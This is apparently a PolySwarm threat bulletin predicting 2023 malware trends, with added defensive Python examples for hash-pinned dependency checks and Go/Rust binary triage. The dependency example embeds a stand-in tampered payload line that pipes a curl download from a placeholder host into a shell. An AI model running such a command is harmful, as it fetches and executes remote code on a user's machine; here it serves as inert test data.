Executive Summary
This threat bulletin features PolySwarm analysts’ predictions for the 2023 threat landscape.
Key Takeaways
- This threat bulletin contains our analysts’ predictions for the 2023 threat landscape.
- Some predictions are based on analyzing trends in threat actor activity and malware over the past year and anticipating an increase in or continuation of that activity.
- Other predictions are based on emerging threats our analysts noted in recent months.
Analysts’ Predictions for 2023
For 2023, our analysts offer the following predictions for the threat landscape:
An increase in mobile malware
As people worldwide increasingly use mobile phones for work, shopping, banking, and even vaccine passports, threat actors gain new opportunities for data theft. This broadening landscape will motivate threat actors to find novel ways to target mobile devices. We expect mobile ransomware and infostealers, in particular, to become more prevalent in 2023 relative to 2022.
A continued increase in malware targeting Linux systems and IoT devices
In 2022, we saw many malware families targeting Linux systems and IoT devices. As threat actors become more familiar with these platforms and inexpensive, easily purchased IoT devices continue to proliferate, we expect malware targeting these systems to keep increasing.
Continued cyber activity targeting both Ukraine and Russia
In 2022, we observed ongoing cyber activity that paralleled the kinetic Russia-Ukraine conflict. Attacks, including sabotage, espionage, hacktivist operations, and other cyber activity, were used to give one side of the conflict an advantage or to serve as a warning to the other. As the Russia-Ukraine conflict continues, so will cyber activity targeting the two nations and possibly their allies.
Continued software supply chain attacks
In 2020, the now-infamous SolarWinds breach saw threat actors leverage a software supply chain attack to gain access to multiple entities worldwide. In 2021 and 2022, threat actors exploited the Log4Shell vulnerability in the widely embedded Log4j library. In 2022, we also observed threat actors leveraging other software supply chain attacks, including attacks on PyPI packages. We expect threat actors to continue this trend in 2023, targeting open-source code repositories and third-party cloud and backend vendors used by large corporations and public sector entities.
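One practical check against tampered or substituted packages from a repository such as PyPI is to pin every dependency to an exact version and a known hash, so that a mismatch becomes a hard install failure rather than a silent compromise. The script below is an added example written for this bulletin, not PolySwarm code and not pip itself; it mimics the behaviour of pip's hash-checking (--require-hashes) mode on a constructed requirements file. The package name "examplelib", the stand-in wheel bytes, and the tampered copy are all hypothetical inputs constructed inline.

```python
"""Hash-pinned dependency check in the style of pip's --require-hashes mode.

Added example (not PolySwarm's code, not pip). Every requirement must be
pinned to an exact version and carry at least one sha256; a downloaded
artifact is accepted only if its digest is on that allow-list. All inputs
below are constructed stand-ins, not real packages.
"""
import hashlib
import re
from typing import Dict, List, Tuple

HASH_RE = re.compile(r"--hash=sha256:([0-9a-f]{64})")
PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)==(\S+)")


def parse_requirements(text: str) -> Dict[str, Tuple[str, List[str]]]:
    """Map normalised package name -> (version, [allowed sha256 digests]).

    Raises ValueError for any requirement that is not pinned to an exact
    version with at least one hash, mirroring pip's refusal in hash mode.
    """
    logical = text.replace("\\\n", " ")  # join backslash continuation lines
    pins: Dict[str, Tuple[str, List[str]]] = {}
    for raw in logical.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blanks
        if not line:
            continue
        m = PIN_RE.match(line)
        digests = HASH_RE.findall(line)
        if m is None or not digests:
            raise ValueError(f"unpinned or unhashed requirement: {line!r}")
        pins[m.group(1).lower().replace("_", "-")] = (m.group(2), digests)
    return pins


def requirements_are_locked(text: str) -> bool:
    """True only if every line in the file is version- and hash-pinned."""
    try:
        parse_requirements(text)
        return True
    except ValueError:
        return False


def verify_artifact(name: str, data: bytes, pins: Dict[str, Tuple[str, List[str]]]) -> bool:
    """True if the downloaded bytes match one of the pinned digests for `name`."""
    key = name.lower().replace("_", "-")
    if key not in pins:
        return False  # nothing vouches for a package that was never pinned
    _version, allowed = pins[key]
    return hashlib.sha256(data).hexdigest() in allowed


# Constructed stand-ins (hypothetical package, not a real wheel).
GOOD_WHEEL = b"PK\x03\x04" + b"examplelib-1.4.2 (constructed stand-in for a wheel)\n"
# A tampered copy: same package, extra payload appended by an attacker.
TAMPERED_WHEEL = GOOD_WHEEL + b"import os; os.system('curl http://example.invalid | sh')\n"

# Constructed requirements.txt; the hash is generated from the stand-in above.
REQUIREMENTS = (
    "# constructed lock file for the example\n"
    "examplelib==1.4.2 \\\n"
    f"    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}\n"
)
PINS = parse_requirements(REQUIREMENTS)

if __name__ == "__main__":
    print("locked file:", requirements_are_locked(REQUIREMENTS))
    print("good wheel accepted:", verify_artifact("examplelib", GOOD_WHEEL, PINS))
    print("tampered wheel accepted:", verify_artifact("examplelib", TAMPERED_WHEEL, PINS))
    print("unpinned name accepted:", verify_artifact("typosquat-lib", GOOD_WHEEL, PINS))
```

The same idea applies to any artifact a build pulls from a third party: pin the version, pin the digest, and fail closed when either is missing, so that a compromised upstream package or a typosquatted name cannot reach production unnoticed.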
An increase in attacks targeting satellite communications systems
In 2022, we saw various incidents in which threat actors targeted satellite communications systems. In early 2022, Russian threat actors attacked Viasat, deploying the AcidRain wiper against modems on its KA-SAT network. A security researcher also demonstrated a method for compromising Starlink user terminals using a homemade circuit board (a modchip). Starlink proved to be a valuable means of communication during the ongoing Russia-Ukraine conflict, as critical infrastructure in both nations was targeted or became unstable. Additionally, digital nomads, those who have adopted a full-time RV or van lifestyle, and individuals in rural areas not serviced by other ISPs rely on Starlink or other satellite internet providers as their primary source of internet, particularly for remote work. As more companies and individuals adopt satellite communications as their primary internet source, threat actors will have an increased incentive to target these systems. Satellite systems are also the primary mode of communication in countries cut off from major internet infrastructure by natural disasters or geopolitical conflict, making them targets of state-sponsored threat actor groups.
Ransomware gangs and other financially motivated threat actors will find new avenues of extortion
In 2022, we saw an increase in double, triple, and even quadruple extortion tactics, in which threat actors layer additional pressure on top of encryption (leaking stolen data, contacting the victim's customers or partners, and other novel TTPs) to increase the likelihood of ransom payment. We expect threat actors to continue discovering new extortion methods in 2023. One tactic already in use by some gangs is the threat of DDoS and other direct attacks against victims unwilling to pay the ransom.
An increase in cybercrime targeting cryptocurrency
In 2022, threat actors targeted multiple aspects of the DeFi economy. Threat actors were discovered targeting crypto wallets, stealing funds directly from cryptocurrency exchanges, and even embedding malware in NFTs. As more people begin to invest in and use cryptocurrency for payments in the coming year, threat actors will broaden their targeting of cryptocurrency. They will find new ways to steal these currencies and target associated exchanges, apps, wallets, and NFTs.
An increase in ransomware and other malware written in Go or Rust
In 2022, we saw many malware and ransomware families branch out, with new variants of existing families written in Go or Rust. Threat actors are gravitating to these languages because they cross-compile easily to Windows, Linux, and other platforms from a single code base and produce statically linked binaries with few runtime dependencies. The resulting binaries are also harder to analyze: their large size, unusual calling conventions, and runtime-specific structures defeat many existing signatures and slow down reverse engineering with tooling built around C and C++ code. Threat actors will continue to take advantage of these benefits, using Go and Rust to create new variants of existing families and new malware to release in the wild.
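A first triage step for a suspect binary is therefore to determine which toolchain built it, since that dictates which decompiler plugins and signature sets apply. The script below is an added example written for this bulletin, not PolySwarm code; it looks for artifacts that Go and Rust toolchains leave in binaries even after symbol stripping (Go's build-info header, the .gopclntab section name and runtime version string; Rust's std panic messages and /rustc/<commit>/library/ source paths). The three sample blobs are constructed byte strings that imitate those artifacts, not real malware.

```python
"""Toolchain triage: does a compiled sample look like Go or Rust?

Added example (not PolySwarm's code). Go and Rust leave recognisable
artifacts that survive stripping; this scanner reports which ones a blob
contains and a best-guess toolchain. The samples at the bottom are
constructed byte strings, not real binaries.
"""
import re
from typing import Dict, List, Optional

# Artifacts the Go linker embeds in every binary, stripped or not.
GO_MARKERS: Dict[str, bytes] = {
    "buildinfo_header": rb"\xff Go buildinf:",   # magic of the .go.buildinfo blob
    "gopclntab_section": rb"\.gopclntab",        # Go line-table section name
    "runtime_symbol": rb"runtime\.goexit",       # runtime symbol kept in stripped builds
}
GO_VERSION = re.compile(rb"(?<![A-Za-z])go1\.\d+(?:\.\d+)?")

# Strings the Rust standard library bakes into release builds.
RUST_MARKERS: Dict[str, bytes] = {
    "std_source_path": rb"/rustc/[0-9a-f]{40}/library/",
    "unwrap_panic": rb"called `(?:Option|Result)::unwrap\(\)` on an? `(?:None|Err)` value",
    "unwind_symbol": rb"rust_begin_unwind",
}
RUST_COMMIT = re.compile(rb"/rustc/([0-9a-f]{40})/")


def fingerprint(data: bytes) -> Dict[str, object]:
    """Return matched markers, version hints, and a best-guess toolchain."""
    go_hits: List[str] = [n for n, p in GO_MARKERS.items() if re.search(p, data)]
    rust_hits: List[str] = [n for n, p in RUST_MARKERS.items() if re.search(p, data)]
    go_ver = GO_VERSION.search(data)
    rust_commit = RUST_COMMIT.search(data)

    # A bare "go1.x" version string is weak evidence on its own, so the
    # verdict is driven by the structural markers above.
    if go_hits and not rust_hits:
        verdict = "go"
    elif rust_hits and not go_hits:
        verdict = "rust"
    elif go_hits and rust_hits:
        verdict = "mixed"  # e.g. a Go loader carrying an embedded Rust payload
    else:
        verdict = "unknown"

    go_version: Optional[str] = go_ver.group(0).decode() if go_ver else None
    commit: Optional[str] = rust_commit.group(1).decode() if rust_commit else None
    return {
        "toolchain": verdict,
        "go_markers": go_hits,
        "go_version": go_version,
        "rust_markers": rust_hits,
        "rust_commit": commit,
    }


def fingerprint_file(path: str) -> Dict[str, object]:
    """Convenience wrapper: fingerprint a file on disk."""
    with open(path, "rb") as fh:
        return fingerprint(fh.read())


# Constructed stand-ins (not real binaries): just enough bytes to carry the markers.
SAMPLE_GO = (b"\x7fELF" + b"\x00" * 16 + b".gopclntab\x00"
             + b"\xff Go buildinf:\x08\x02" + b"go1.19.4\x00runtime.goexit\x00")
SAMPLE_RUST = (b"MZ" + b"\x00" * 32 + b"/rustc/" + b"a" * 40
               + b"/library/std/src/panicking.rs\x00"
               + b"called `Option::unwrap()` on a `None` value\x00")
SAMPLE_C = b"\x7fELF" + b"\x00" * 16 + b"GCC: (GNU) 12.2.0\x00libc.so.6\x00"

if __name__ == "__main__":
    for label, blob in (("go", SAMPLE_GO), ("rust", SAMPLE_RUST), ("c", SAMPLE_C)):
        print(label, fingerprint(blob))
```

String markers are a triage hint, not proof: a packer or a deliberate string-mangling pass can hide them, so treat an "unknown" verdict on a suspicious sample as a reason to look harder, not as a clean bill of health.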
An increase in wiper malware attacks, including wipers masquerading as ransomware
In 2022, we saw around a dozen new wiper malware families, some of them masquerading as ransomware by dropping ransom notes while destroying data with no recovery path. PolySwarm analysts predict this trend will continue into 2023, with nation-state threat actors and hacktivist groups potentially using wipers for sabotage.
New Crime as a Service offerings
In 2022, we observed multiple crime-as-a-service offerings, including ransomware as a service, DDoS for hire, C2 as a service, and pay-per-install malware services. Threat actors with advanced capabilities will continue to monetize these services by selling them to less skilled individuals motivated by greed, espionage, or a thirst for revenge. Initial access brokers will also continue to sell stolen credentials and access to compromised networks. As new attack vectors are discovered and methods are perfected, new crime-as-a-service offerings will emerge in the underground.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports